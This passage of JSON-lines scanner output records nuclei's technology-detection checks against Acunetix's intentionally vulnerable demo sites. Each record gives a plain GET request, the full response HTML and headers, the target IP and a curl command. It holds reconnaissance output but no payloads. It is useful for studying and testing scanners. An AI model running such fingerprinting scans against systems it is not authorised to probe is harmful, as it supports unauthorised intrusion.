Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.807504996Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"ms-iis\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:36.815415734Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angular\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.842667695Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"angular\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.865487547Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"dreamweaver\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful 